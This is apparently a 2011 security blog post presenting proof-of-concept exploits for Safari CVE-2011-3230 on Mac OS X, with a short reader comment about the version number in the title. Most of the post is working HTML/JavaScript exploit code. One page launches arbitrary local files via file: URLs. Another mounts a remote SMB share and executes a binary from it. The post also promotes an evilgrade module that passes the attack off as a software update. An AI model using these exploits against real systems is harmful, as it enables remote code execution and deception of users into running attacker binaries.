Safari 5.1.1 Old School Remote Execution PoC (CVE-2011-3230)


On October 12 Aaron Sigel was published an interesting bug (CVE-2011-3230) in the latest version of Safari version < 5.1.1 (Mac OS X only)

Aaron noticed that  “It allows you to send any 'file:' url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.”

The following POC exposes the vulnerability:

<html>
<head>
<base href="file://">
<script>
 function DoIt() {
  alert(document.getElementById("cmdToRun").value);
  document.location=document.getElementById("cmdToRun").value;
 }
</script>
</head>
<body>
<select id="cmdToRun">
 <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
 <option value="/etc/passwd">Launch /etc/passwd</option>
 <option value="/Applications/Utilities/Bluetooth File Exchange.app">
Launch Bluetooth File Exchange.app</option>
</select>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />
</body>
</html>

As we can see above, you can not give arguments to it and you need to know exactly the path it takes to run.

Additionally LaunchServices checks the "quarantine bit" and thus can not directly execute a binary downloaded from the Internet.

Modifying a little exploit we can execute a binary of our possession:



<html>
<head>
<base href="file://">
</head>
<body>
    <iframe src="smb://Administrador:X@x.x.x.x/C$"
      width="0" height="0" scrolling="auto"   frameborder="1" transparency>
    </iframe>
<script>
function sleep(milliSeconds){
        var startTime = new Date().getTime(); // get the current time
        while (new Date().getTime() < startTime + milliSeconds); // hog cpu
}
sleep(8000);
document.location="/Volumes/C$/infobyte/ls";
</script>
</body>
</html> 



In this example:
1) We mount an SMB partition, so you can guess the directory /Volumes/[NAMESHARE]
2) Then we sleep for a while until the unit is mounted.
3) Finally run the binary, in this case a simple "ls".

For this attack you can use other protocols such as "FTP / AFP"

The problem is that an alert will pop up asking for user confirmation to execute the binary.

We just added the module safari.pm to evilgrade to take advantage of this vulnerability and make users believe it's an update.

Dowload the last version: https://code.google.com/p/isr-evilgrade/source/list

The funny thing is that there are unknown file types by Mac OS X and these ones without user interaction can be executed by the launch services.


The following PoC uses the FTP service and then open a PDF:
http://www.infobytesec.com/exploit/ISR-safaripoc.html

Imagine for example the combination of this vulnerability with a dangerous file type..
Congratulations for the research to this 'old school' vulnerability Aaron Sigel (@diretraversal).

Reference:
http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
http://support.apple.com/kb/HT5000

1 comments :

Click here for comments
October 18, 2011 at 2:11 PM ×

The headline of the article says "Safari 5.1.1", but you (and Aaron and Apple) state elsewhere that this is applies to versions prior to 5.1.1.

I just wish to avoid confusion.

Selamat jpgoldberg dapat PERTAMAX...! Silahkan antri di pom terdekat heheheh...
Balas
avatar
admin
Post a Comment
Thanks for your comment